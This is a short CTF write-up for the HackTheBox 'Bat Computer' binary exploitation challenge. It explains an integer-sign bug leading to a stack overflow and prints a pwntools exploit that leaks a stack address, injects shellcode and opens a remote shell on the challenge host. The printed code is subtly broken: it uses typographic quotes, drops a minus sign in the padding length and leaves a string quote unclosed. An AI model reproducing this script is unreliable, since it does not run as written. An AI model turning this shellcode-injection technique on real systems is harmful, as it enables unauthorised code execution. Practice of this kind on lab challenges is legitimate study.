We covered a scenario of buffer overflow where a variable was declared as an unsigned integer and then casted to the function ulong. This let us send ‘-1’ as an input to this variable which redirected the program execution flow into an if statement that contained a snippet where a name variable with 96 bytes accepts an unrestricted input from the user which resulted in segmentation fault. We calculated the offset using pwndbg with python and created the final exploit.This was part of HackTheBox Bat Computer | Intro to binary exploitation

Buffer Overflow Techniques Notes

Exploit Code is below

##Beginning

from pwn import *

context.binary = ELF(‘./batcomputer’)

con = remote(‘157.245.39.76’,31662)

con.sendline(‘1’)

con.recvuntil(‘0x’)

stack_base = int((“0x”+con.recv().decode(‘latin-1’).split()[0]),16)

log.success(f‘stack base: {hex(stack_base)})

con.sendline(‘2’)

con.sendline(‘b4tp@$$w0rd!’)

payload = asm(shellcraft.popad() + shellcraft.sh()) # shellcode

payload += b‘A’*(84 len(payload)) # nop

payload += p64(stack_base) # stack base

con.sendline(payload)

con.sendline(‘3’)

con.interactive()

##Ending

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles